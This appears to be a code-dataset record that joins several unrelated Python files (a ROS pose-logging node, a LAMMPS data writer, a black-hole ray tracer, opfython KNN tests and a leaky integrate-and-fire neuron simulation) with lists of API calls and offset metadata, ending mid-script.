cov = dse_lib.sub_matrix(inf_P, inf_id_list, id, self.dim_state)
cov = dse_lib.state_cov_to_covariance_matrix(cov)
est_covariance.append(cov)
this_pose = self.gazebo_model_object.get_model_pose(name)
this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose))
true_pose.append(this_xyy)
if len(self.est_poses[agent_index]) > 1 and np.linalg.norm(np.array(est_pose) - self.est_poses[agent_index][-1]) > 1:
print('error')
# for est in est_pose:
# if np.allclose(est, [-2, 0, np.pi/2]) or np.allclose(est, [0, 0, np.pi/2]) or np.allclose(est, [2, 0, np.pi/2]):
# print('error')
        time = rospy.Time.now().to_sec() # single call; also avoids Python 2 integer division of nsecs
self.time[agent_index].append(time)
self.true_poses[agent_index].append(np.array(true_pose))
self.est_poses[agent_index].append(np.array(est_pose))
# if est_pose[1][2] - 1.5707633 < 0.0001:
# print('weird error')
self.est_covariances[agent_index].append(est_covariance)
def store_data(self, data):
if data.data:
time_np = []
true_poses_np = []
est_poses_np = []
est_covariances_np = []
for i in range(len(self.agent_ids)):
time_np.append(np.array(self.time[i]))
true_poses_np.append(np.array(self.true_poses[i]))
est_poses_np.append(np.array(self.est_poses[i]))
est_covariances_np.append(np.array(self.est_covariances[i]))
header = '[header, time, object_ids, object_names, agent_names, agent_ids, true_poses, est_poses, est_covariances]'
cal = [header, time_np, self.object_ids, self.object_names, self.agent_names, self.agent_ids,
true_poses_np, est_poses_np, est_covariances_np]
dump_file = "simulation_data_" + str(rospy.Time.now()) + ".p"
pickle.dump(cal, open(os.path.join(sys.path[0], dump_file), "wb"))
def main(args):
rospy.init_node('dse_plotting_node', anonymous=True)
imf = information_filter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
main(sys.argv)
|
[
"dse_lib.pose_from_state_3D",
"dse_lib.sub_matrix",
"rospy.Subscriber",
"rospy.Time.now",
"os.path.join",
"dse_lib.state_from_pose_3D",
"rospy.signal_shutdown",
"rospy.get_param",
"roslib.load_manifest",
"numpy.where",
"numpy.array",
"rospy.init_node",
"numpy.linalg.inv",
"rospy.spin",
"gazebo_lib.GazeboModel",
"dse_lib.multi_array_2d_output",
"dse_lib.state_cov_to_covariance_matrix"
] |
[((822, 860), 'roslib.load_manifest', 'roslib.load_manifest', (['"""dse_simulation"""'], {}), "('dse_simulation')\n", (842, 860), False, 'import roslib\n'), ((6055, 6107), 'rospy.init_node', 'rospy.init_node', (['"""dse_plotting_node"""'], {'anonymous': '(True)'}), "('dse_plotting_node', anonymous=True)\n", (6070, 6107), False, 'import rospy\n'), ((1681, 1708), 'rospy.get_param', 'rospy.get_param', (['"""~objects"""'], {}), "('~objects')\n", (1696, 1708), False, 'import rospy\n'), ((1735, 1765), 'rospy.get_param', 'rospy.get_param', (['"""~object_ids"""'], {}), "('~object_ids')\n", (1750, 1765), False, 'import rospy\n'), ((1791, 1820), 'rospy.get_param', 'rospy.get_param', (['"""~agent_ids"""'], {}), "('~agent_ids')\n", (1806, 1820), False, 'import rospy\n'), ((1846, 1878), 'rospy.get_param', 'rospy.get_param', (['"""~dim_state"""', '(6)'], {}), "('~dim_state', 6)\n", (1861, 1878), False, 'import rospy\n'), ((1949, 2003), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/store_data"""', 'Bool', 'self.store_data'], {}), "('/store_data', Bool, self.store_data)\n", (1965, 2003), False, 'import rospy\n'), ((2040, 2081), 'gazebo_lib.GazeboModel', 'gazebo_lib.GazeboModel', (['self.object_names'], {}), '(self.object_names)\n', (2062, 2081), False, 'import gazebo_lib\n'), ((3104, 3122), 'numpy.array', 'np.array', (['data.ids'], {}), '(data.ids)\n', (3112, 3122), True, 'import numpy as np\n'), ((3139, 3185), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_matrix'], {}), '(data.inf_matrix)\n', (3168, 3185), False, 'import dse_lib\n'), ((3202, 3248), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_vector'], {}), '(data.inf_vector)\n', (3231, 3248), False, 'import dse_lib\n'), ((3318, 3338), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3331, 3338), True, 'import numpy as np\n'), ((6156, 6168), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6166, 6168), False, 'import rospy\n'), ((3702, 3753), 'dse_lib.pose_from_state_3D', 'dse_lib.pose_from_state_3D', (['self.inf_x[i_min:i_max]'], {}), '(self.inf_x[i_min:i_max])\n', (3728, 3753), False, 'import dse_lib\n'), ((3987, 4045), 'dse_lib.sub_matrix', 'dse_lib.sub_matrix', (['inf_P', 'inf_id_list', 'id', 'self.dim_state'], {}), '(inf_P, inf_id_list, id, self.dim_state)\n', (4005, 4045), False, 'import dse_lib\n'), ((4064, 4107), 'dse_lib.state_cov_to_covariance_matrix', 'dse_lib.state_cov_to_covariance_matrix', (['cov'], {}), '(cov)\n', (4102, 4107), False, 'import dse_lib\n'), ((4852, 4871), 'numpy.array', 'np.array', (['true_pose'], {}), '(true_pose)\n', (4860, 4871), True, 'import numpy as np\n'), ((4916, 4934), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4924, 4934), True, 'import numpy as np\n'), ((2491, 2597), 'rospy.Subscriber', 'rospy.Subscriber', (["(self.agent_names[i] + '/dse/inf/results')", 'InfFilterResults', 'self.results_callback', 'i'], {}), "(self.agent_names[i] + '/dse/inf/results', InfFilterResults,\n self.results_callback, i)\n", (2507, 2597), False, 'import rospy\n'), ((2919, 2977), 'rospy.signal_shutdown', 'rospy.signal_shutdown', (['"""invalid state dimension passed in"""'], {}), "('invalid state dimension passed in')\n", (2940, 2977), False, 'import rospy\n'), ((3270, 3290), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3283, 3290), True, 'import numpy as np\n'), ((3801, 3838), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (3827, 3838), False, 'import dse_lib\n'), 
((4264, 4301), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (4290, 4301), False, 'import dse_lib\n'), ((4704, 4720), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4718, 4720), False, 'import rospy\n'), ((3561, 3588), 'numpy.where', 'np.where', (['(inf_id_list == id)'], {}), '(inf_id_list == id)\n', (3569, 3588), True, 'import numpy as np\n'), ((4728, 4744), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4742, 4744), False, 'import rospy\n'), ((5343, 5365), 'numpy.array', 'np.array', (['self.time[i]'], {}), '(self.time[i])\n', (5351, 5365), True, 'import numpy as np\n'), ((5404, 5432), 'numpy.array', 'np.array', (['self.true_poses[i]'], {}), '(self.true_poses[i])\n', (5412, 5432), True, 'import numpy as np\n'), ((5470, 5497), 'numpy.array', 'np.array', (['self.est_poses[i]'], {}), '(self.est_poses[i])\n', (5478, 5497), True, 'import numpy as np\n'), ((5541, 5574), 'numpy.array', 'np.array', (['self.est_covariances[i]'], {}), '(self.est_covariances[i])\n', (5549, 5574), True, 'import numpy as np\n'), ((5987, 6023), 'os.path.join', 'os.path.join', (['sys.path[0]', 'dump_file'], {}), '(sys.path[0], dump_file)\n', (5999, 6023), False, 'import os\n'), ((4410, 4428), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4418, 4428), True, 'import numpy as np\n'), ((5928, 5944), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (5942, 5944), False, 'import rospy\n')]
|
import numpy as np
class Atom:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
self.type = 1
self.vx = 0.0
self.vy = 0.0
self.vz = 0.0
def save_file(filename, atoms, lo, hi):
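    # write atom positions and velocities as a LAMMPS-style data file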
with open(filename, "w") as f:
f.write("Position Data\n\n")
f.write("{} atoms\n".format(len(atoms)))
f.write("1 atom types\n\n")
f.write(f"{lo} {hi} xlo xhi\n")
f.write(f"{lo} {hi} ylo yhi\n")
f.write(f"{lo} {hi} zlo zhi\n")
f.write("\n")
f.write("Atoms\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {} {}\n".format(i+1, a.type, a.x, a.y, a.z))
f.write("\n")
f.write("Velocities\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {}\n".format(i+1, a.vx, a.vy, a.vz))
print("Generated {}".format(filename))
if __name__ == "__main__":
lo = -10
hi = 30
atoms = []
for x in np.arange(lo, hi, 1):
atoms.append(Atom(x, 0, 0))
save_file("test.atoms", atoms, lo, hi)
|
[
"numpy.arange"
] |
[((1017, 1037), 'numpy.arange', 'np.arange', (['lo', 'hi', '(1)'], {}), '(lo, hi, 1)\n', (1026, 1037), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from glsl_helpers import *
degtorad = lambda a: a / 180.0 * np.pi
def smooth_step(x, threshold, steepness):
return 1.0 / (1.0 + exp(-(x - threshold) * steepness))
def trace_u(pos, ray, path):
n_steps = path.shape[0]
u0 = 1.0 / length(pos)
u = u0
normal_vec = normalize(pos)
tangent_vec = normalize(cross(cross(normal_vec, ray), normal_vec))
du = -dot(ray, normal_vec) / dot(ray, tangent_vec) * u
du0 = du
theta = 0
t = 0
ddu = 0
MAX_REVOLUTIONS = 2
theta_step = 2.0 * M_PI * MAX_REVOLUTIONS / float(n_steps)
for j in range(n_steps):
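        # adaptive step size: limit the relative change of u within a single step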
max_rel_u_change = (1 - log(u)) * 10.0 / float(n_steps)
step = theta_step
if (du > 0 or (du0 < 0.0 and u0 / u < 5.0)) and abs(du) > abs(max_rel_u_change * u) / theta_step:
step = max_rel_u_change * u / abs(du)
path[j, 0:3] = pos
path[j, 3] = t
u += du * step
ddu = -u * (1.0 - 1.5 * u * u)
du += ddu * step
if u < 0.0: break
if u < 1.0: dt = sqrt(du * du + u * u * (1.0 - u)) / (u * u * (1.0 - u)) * step
theta += step
old_pos = pos
pos = (cos(theta) * normal_vec + sin(theta) * tangent_vec) / u
if u > 1.0: break
mix = smooth_step(1.0 / u, 8.0, 2.0)
dt = mix * length(pos - old_pos) + (1.0 - mix) * dt
t += dt
def path_r(path):
return np.sqrt(np.sum(path[:, 0:3] * path[:, 0:3], 1))
def path_x(path): return path[:, 0]
def path_y(path): return path[:, 1]
def path_time(path): return path[:, 3]
def path_arc_length(path):
return np.hstack(([0], np.cumsum(path_r(path[1:] - path[:-1]))))
def path_angle(path):
angles = np.zeros(path[:, 0].shape) + np.nan
diffs = path[1:] - path[:-1]
angles[:-1] = np.arctan2(diffs[:, 1], diffs[:, 0])
return angles
def get_first_non_nas(array):
nas = np.where(np.logical_not(np.isfinite(array)))[0]
if nas.size == 0 or nas[0] == 0: return array
return array[:nas[0]]
def last_cont_non_na(array):
array = get_first_non_nas(array)
if array.size == 0: return np.nan
return array[-1]
def crossing_func(path, x_func, y_func, threshold):
x = get_first_non_nas(x_func(path))
y = get_first_non_nas(y_func(path))
if x.size < 2 or y.size < 2: return np.nan
ins = np.where(y < threshold)[0]
if ins.size == 0 or ins[0] == 0: return np.nan
i1 = ins[0]
i0 = i1 - 1
return np.interp(threshold, [y[i1], y[i0]], [x[i1], x[i0]])
def ball_entry_time(path, radius):
return crossing_func(path, path_time, path_r, radius)
def ball_entry_dist(path, radius):
return crossing_func(path, path_arc_length, path_r, radius)
def last_angle(path):
return last_cont_non_na(path_angle(path))
def deflection_angle(path):
if last_cont_non_na(path_r(path)) < 2.0: return np.nan
return last_angle(path) - path_angle(path)[0]
class PlotParams:
def __init__(self, **kwargs):
self.solver_func = trace_u
self.n_steps = 500
self.angle = 30
self.x0 = -4
self.plot = True
self.plot_scale = 5
self.plot_xlim = None
self.plot_ylim = None
self.plot_x = path_x
self.plot_y = path_y
self.plot_args = {}
def set_params(self, **kwargs):
for param, value in kwargs.items():
setattr(self, param, value)
def trace_ray(ray=None, **kwargs):
if ray is None: ray = PlotParams()
ray.set_params(**kwargs)
path = np.zeros((ray.n_steps, 4)) + np.nan
a = degtorad(ray.angle)
pos0 = (ray.x0, 0, 0)
ray_dir = (np.cos(a), np.sin(a), 0)
pos = np.ravel(pos0).T * 1.0
ray_dir = np.ravel(ray_dir).T * 1.0
ray.solver_func(pos, ray_dir, path)
if ray.plot is True:
plt.plot(ray.plot_x(path), ray.plot_y(path), **ray.plot_args)
if ray.plot_scale is not None:
plt.xlim([-ray.plot_scale, ray.plot_scale])
plt.ylim([-ray.plot_scale, ray.plot_scale])
if ray.plot_xlim is not None: plt.xlim(ray.plot_xlim)
if ray.plot_ylim is not None: plt.ylim(ray.plot_ylim)
return path
def trace_rays(n_rays=1, **kwargs):
agg_xy = np.zeros((n_rays, 2)) + np.nan
for j in range(n_rays):
ray = PlotParams()
ray.aggregate_plot_x = None
ray.set_params(**kwargs)
ray.idx = j
ray.rel = (j + 1) / float(n_rays)
yield (ray)
path = trace_ray(ray)
if ray.aggregate_plot_x is not None:
agg_xy[j, 0] = ray.aggregate_plot_x(path)
agg_xy[j, 1] = ray.aggregate_plot_y(path)
if ray.aggregate_plot_x is not None:
if ray.plot is True: plt.show()
plt.plot(agg_xy[:, 0], agg_xy[:, 1])
#trace_rays()
|
[
"matplotlib.pyplot.xlim",
"numpy.arctan2",
"numpy.sum",
"matplotlib.pyplot.plot",
"numpy.ravel",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.show",
"numpy.zeros",
"numpy.isfinite",
"numpy.where",
"numpy.sin",
"numpy.cos",
"numpy.interp"
] |
[((1837, 1873), 'numpy.arctan2', 'np.arctan2', (['diffs[:, 1]', 'diffs[:, 0]'], {}), '(diffs[:, 1], diffs[:, 0])\n', (1847, 1873), True, 'import numpy as np\n'), ((2498, 2550), 'numpy.interp', 'np.interp', (['threshold', '[y[i1], y[i0]]', '[x[i1], x[i0]]'], {}), '(threshold, [y[i1], y[i0]], [x[i1], x[i0]])\n', (2507, 2550), True, 'import numpy as np\n'), ((1458, 1496), 'numpy.sum', 'np.sum', (['(path[:, 0:3] * path[:, 0:3])', '(1)'], {}), '(path[:, 0:3] * path[:, 0:3], 1)\n', (1464, 1496), True, 'import numpy as np\n'), ((1750, 1776), 'numpy.zeros', 'np.zeros', (['path[:, 0].shape'], {}), '(path[:, 0].shape)\n', (1758, 1776), True, 'import numpy as np\n'), ((2377, 2400), 'numpy.where', 'np.where', (['(y < threshold)'], {}), '(y < threshold)\n', (2385, 2400), True, 'import numpy as np\n'), ((3554, 3580), 'numpy.zeros', 'np.zeros', (['(ray.n_steps, 4)'], {}), '((ray.n_steps, 4))\n', (3562, 3580), True, 'import numpy as np\n'), ((3660, 3669), 'numpy.cos', 'np.cos', (['a'], {}), '(a)\n', (3666, 3669), True, 'import numpy as np\n'), ((3671, 3680), 'numpy.sin', 'np.sin', (['a'], {}), '(a)\n', (3677, 3680), True, 'import numpy as np\n'), ((4240, 4261), 'numpy.zeros', 'np.zeros', (['(n_rays, 2)'], {}), '((n_rays, 2))\n', (4248, 4261), True, 'import numpy as np\n'), ((4752, 4788), 'matplotlib.pyplot.plot', 'plt.plot', (['agg_xy[:, 0]', 'agg_xy[:, 1]'], {}), '(agg_xy[:, 0], agg_xy[:, 1])\n', (4760, 4788), True, 'import matplotlib.pyplot as plt\n'), ((3696, 3710), 'numpy.ravel', 'np.ravel', (['pos0'], {}), '(pos0)\n', (3704, 3710), True, 'import numpy as np\n'), ((3733, 3750), 'numpy.ravel', 'np.ravel', (['ray_dir'], {}), '(ray_dir)\n', (3741, 3750), True, 'import numpy as np\n'), ((3948, 3991), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (3956, 3991), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4047), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (4012, 4047), True, 'import matplotlib.pyplot as plt\n'), ((4086, 4109), 'matplotlib.pyplot.xlim', 'plt.xlim', (['ray.plot_xlim'], {}), '(ray.plot_xlim)\n', (4094, 4109), True, 'import matplotlib.pyplot as plt\n'), ((4148, 4171), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ray.plot_ylim'], {}), '(ray.plot_ylim)\n', (4156, 4171), True, 'import matplotlib.pyplot as plt\n'), ((4733, 4743), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4741, 4743), True, 'import matplotlib.pyplot as plt\n'), ((1958, 1976), 'numpy.isfinite', 'np.isfinite', (['array'], {}), '(array)\n', (1969, 1976), True, 'import numpy as np\n')]
|
import numpy as np
from opfython.math import distance
from opfython.stream import loader, parser
from opfython.subgraphs import knn
csv = loader.load_csv('data/boat.csv')
X, Y = parser.parse_loader(csv)
def test_knn_subgraph_n_clusters():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.n_clusters == 0
def test_knn_subgraph_n_clusters_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.n_clusters = 0.5
except:
subgraph.n_clusters = 1
assert subgraph.n_clusters == 1
try:
subgraph.n_clusters = -1
except:
subgraph.n_clusters = 1
assert subgraph.n_clusters == 1
def test_knn_subgraph_best_k():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.best_k == 0
def test_knn_subgraph_best_k_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.best_k = 0.5
except:
subgraph.best_k = 1
assert subgraph.best_k == 1
try:
subgraph.best_k = -1
except:
subgraph.best_k = 1
assert subgraph.best_k == 1
def test_knn_subgraph_constant():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.constant == 0.0
def test_knn_subgraph_constant_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.constant = 'a'
except:
subgraph.constant = 2.5
assert subgraph.constant == 2.5
def test_knn_subgraph_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.density == 0.0
def test_knn_subgraph_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.density = 'a'
except:
subgraph.density = 2.5
assert subgraph.density == 2.5
def test_knn_subgraph_min_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.min_density == 0.0
def test_knn_subgraph_min_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.min_density = 'a'
except:
subgraph.min_density = 2.5
assert subgraph.min_density == 2.5
def test_knn_subgraph_max_density():
subgraph = knn.KNNSubgraph(X, Y)
assert subgraph.max_density == 0.0
def test_knn_subgraph_max_density_setter():
subgraph = knn.KNNSubgraph(X, Y)
try:
subgraph.max_density = 'a'
except:
subgraph.max_density = 2.5
assert subgraph.max_density == 2.5
def test_knn_subgraph_calculate_pdf():
subgraph = knn.KNNSubgraph(X, Y)
distances = np.ones((100, 100))
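    # dummy pre-computed pairwise distance matrix to exercise the pre_computed_distance branch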
subgraph.create_arcs(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
subgraph.calculate_pdf(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
subgraph.create_arcs(1, distance.euclidean_distance)
subgraph.calculate_pdf(1, distance.euclidean_distance)
assert subgraph.min_density != 0
assert subgraph.max_density != 0
def test_knn_subgraph_create_arcs():
subgraph = knn.KNNSubgraph(X, Y)
distances = np.ones((100, 100))
distances.fill(0.000001)
subgraph.create_arcs(1, distance.euclidean_distance,
pre_computed_distance=True, pre_distances=distances)
max_distances = subgraph.create_arcs(1, distance.euclidean_distance)
assert len(max_distances) == 1
def test_knn_subgraph_eliminate_maxima_height():
subgraph = knn.KNNSubgraph(X, Y)
subgraph.eliminate_maxima_height(2.5)
assert subgraph.nodes[0].cost == 0
|
[
"opfython.subgraphs.knn.KNNSubgraph",
"opfython.stream.parser.parse_loader",
"numpy.ones",
"opfython.stream.loader.load_csv"
] |
[((140, 172), 'opfython.stream.loader.load_csv', 'loader.load_csv', (['"""data/boat.csv"""'], {}), "('data/boat.csv')\n", (155, 172), False, 'from opfython.stream import loader, parser\n'), ((180, 204), 'opfython.stream.parser.parse_loader', 'parser.parse_loader', (['csv'], {}), '(csv)\n', (199, 204), False, 'from opfython.stream import loader, parser\n'), ((258, 279), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (273, 279), False, 'from opfython.subgraphs import knn\n'), ((377, 398), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (392, 398), False, 'from opfython.subgraphs import knn\n'), ((697, 718), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (712, 718), False, 'from opfython.subgraphs import knn\n'), ((808, 829), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (823, 829), False, 'from opfython.subgraphs import knn\n'), ((1110, 1131), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1125, 1131), False, 'from opfython.subgraphs import knn\n'), ((1227, 1248), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1242, 1248), False, 'from opfython.subgraphs import knn\n'), ((1422, 1443), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1437, 1443), False, 'from opfython.subgraphs import knn\n'), ((1537, 1558), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1552, 1558), False, 'from opfython.subgraphs import knn\n'), ((1733, 1754), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1748, 1754), False, 'from opfython.subgraphs import knn\n'), ((1856, 1877), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1871, 1877), False, 'from opfython.subgraphs import knn\n'), ((2064, 2085), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2079, 2085), False, 'from opfython.subgraphs import knn\n'), ((2187, 2208), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2202, 2208), False, 'from opfython.subgraphs import knn\n'), ((2397, 2418), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2412, 2418), False, 'from opfython.subgraphs import knn\n'), ((2436, 2455), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (2443, 2455), True, 'import numpy as np\n'), ((2977, 2998), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2992, 2998), False, 'from opfython.subgraphs import knn\n'), ((3016, 3035), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (3023, 3035), True, 'import numpy as np\n'), ((3378, 3399), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (3393, 3399), False, 'from opfython.subgraphs import knn\n')]
|
from matplotlib import cm, rcParams
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib as matplotlib
import numpy as np
import math as math
import random as rand
import os, sys, csv
import pandas as pd
#matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2)
c = ['#aa3863', '#d97020', '#ef9f07', '#449775', '#3b7d86', '#5443a3']
# red, orange, yellow, green, blue, purple
dW1, dW2, dW3 = 0, 0, 0
np.random.seed() #42
def lif_euler(dt, v1, v2, I1, I2):
return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) , v2 + dt*(-v2 + gamma*(v1-v2) + I2) ]
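# Stochastic variant of the Euler step (Euler-Maruyama): dW1 and dW2 are independent noise
# increments, one per neuron, while dW3 is a common increment added to both neurons; the
# shared term is what distinguishes the "correlated" condition from the "uncorrelated" one.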
def lif_euler_stoch(dt, v1, v2, I1, I2, s1, s2, s3):
global dW1, dW2, dW3
dW1 = s1*math.sqrt(dt)*np.random.randn()
dW2 = s2*math.sqrt(dt)*np.random.randn()
dW3 = s3*math.sqrt(dt)*np.random.randn()
return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) + dW1 + dW3, v2 + dt*(-v2 + gamma*(v1-v2) + I2) + dW2 + dW3]
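# Runs nb_iterations independent trials of the coupled pair. Each trial integrates the
# deterministic system until the 10th spike, then applies a short noisy current pulse
# (duration 0.2) on top of the baseline, and finally estimates the phase difference phi
# from the last three spike times recorded after t = Dtime.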
def correlations(sigma1, sigma2, sigma3, nb_iterations=1000) :
phis = []
for k in range(nb_iterations) :
#v1_0, v2_0 = 0.7611728117817528, 0.1654125684129333 # Used XPPAUT to find ideal initial conditions s.t. we begin in antiphase with I = 1.4
v1_0, v2_0 = 0.3764002759711251, 0.8546679415731656
x1, x2 = [v1_0], [v2_0]
t = [0]
nb_spikes = 0
I_baseline = 1.5
I1, I2 = [I_baseline], [I_baseline]
pulse_start, pulse_duration = 0, 0.2
begin_pulse = True
while t[-1] < maxtime :
t.append(t[-1]+dt)
if nb_spikes == 10 and begin_pulse :
pulse_start = t[-1]
begin_pulse = False
if nb_spikes >= 10 and t[-1] < pulse_start + pulse_duration :
next_values= lif_euler_stoch(dt, x1[-1], x2[-1], I1[-1], I2[-1], sigma1, sigma2, sigma3)
I1.append(I_baseline + (dW1+dW3)/dt)
I2.append(I_baseline + (dW2+dW3)/dt)
else :
I1.append(I_baseline)
I2.append(I_baseline)
next_values = lif_euler(dt, x1[-1], x2[-1], I1[-1], I2[-1])
if next_values[0] > 1 :
x1.append(0)
nb_spikes += 1
if next_values[1] + gamma*beta > 1 :
x2.append(0)
else :
x2.append(next_values[1]+gamma*beta)
elif next_values[1] > 1 :
x2.append(0)
if next_values[0] + gamma*beta > 1 :
x1.append(0)
else :
x1.append(next_values[0]+gamma*beta)
else :
x1.append(next_values[0])
x2.append(next_values[1])
# Spike times
spike_times, k = [], 0
for i in range(1, len(t)) :
if abs(x1[i]-x1[i-1]) > (Vth-Vr)/2 and t[i] >= Dtime :
spike_times.append(t[i])
k = i
break
for i in range(k, len(t)) :
if abs(x2[i]-x2[i-1]) > (Vth-Vr)/2 :
spike_times.append(t[i])
k = i
break
        for i in range(k, len(t)-1) :
if abs(x1[i+1]-x1[i]) > (Vth-Vr)/2 :
spike_times.append(t[i])
break
phis.append((spike_times[2] - spike_times[1])/(spike_times[2] - spike_times[0]))
"""
# Plot trials
fig, ax = plt.subplots(2, 1, figsize=(12,5), sharey='row')
ax[1].plot(t, x1, label='$V_{1}$', color='#aa3863')
ax[1].plot(t, x2, label='$V_{2}$', color='#3b7d86')
ax[0].plot(t, I1, label='$I_1$')
ax[0].plot(t, I2, label='$I_2$')
ax[0].legend(loc='upper right')
ax[1].legend(loc='upper right')
ax[0].set_title('Noisy input current trial, $\sigma=0.0025, I_{base}=1.5, \gamma=0.4, \\beta=0.1$')
#plt.savefig('trial_example_.png', dpi=600)
plt.show()
"""
phis = np.array(phis) % 1
print("phis ", phis)
return phis
gamma, beta = 0.4, 0.1
Vth, Vr = 1, 0
dt = 0.001
Dtime = 75
maxtime = 80
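# Two sweeps over increasing noise amplitude: the "correlated" runs drive both neurons only
# through the shared noise source sigma3, while the "uncorrelated" runs use only the
# independent sources sigma1 and sigma2.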
# CORRELATED
sigma_corr = [[0., 0., 0.1], [0., 0., 0.15], [0., 0., 0.2], [0., 0., 0.25], [0., 0., 0.3], [0., 0., 0.4]]
phis1_corr = correlations(sigma_corr[0][0], sigma_corr[0][1], sigma_corr[0][2])
phis2_corr = correlations(sigma_corr[1][0], sigma_corr[1][1], sigma_corr[1][2])
phis3_corr = correlations(sigma_corr[2][0], sigma_corr[2][1], sigma_corr[2][2])
phis4_corr = correlations(sigma_corr[3][0], sigma_corr[3][1], sigma_corr[3][2])
phis5_corr = correlations(sigma_corr[4][0], sigma_corr[4][1], sigma_corr[4][2])
phis6_corr = correlations(sigma_corr[5][0], sigma_corr[5][1], sigma_corr[5][2])
# Generate data on phase differences
phis1_corr = pd.Series(phis1_corr)
phis2_corr = pd.Series(phis2_corr)
phis3_corr = pd.Series(phis3_corr)
phis4_corr = pd.Series(phis4_corr)
phis5_corr = pd.Series(phis5_corr)
phis6_corr = pd.Series(phis6_corr)
# UNCORRELATED
sigma_uncorr = [[0.1, 0.1, 0.], [0.15, 0.15, 0.], [0.2, 0.2, 0.], [0.25, 0.25, 0.], [0.3, 0.3, 0.], [0.4, 0.4, 0.]]
phis1_uncorr = correlations(sigma_uncorr[0][0], sigma_uncorr[0][1], sigma_uncorr[0][2])
phis2_uncorr = correlations(sigma_uncorr[1][0], sigma_uncorr[1][1], sigma_uncorr[1][2])
phis3_uncorr = correlations(sigma_uncorr[2][0], sigma_uncorr[2][1], sigma_uncorr[2][2])
phis4_uncorr = correlations(sigma_uncorr[3][0], sigma_uncorr[3][1], sigma_uncorr[3][2])
phis5_uncorr = correlations(sigma_uncorr[4][0], sigma_uncorr[4][1], sigma_uncorr[4][2])
phis6_uncorr = correlations(sigma_uncorr[5][0], sigma_uncorr[5][1], sigma_uncorr[5][2])
# Generate data on phase differences
phis1_uncorr = pd.Series(phis1_uncorr)
phis2_uncorr = pd.Series(phis2_uncorr)
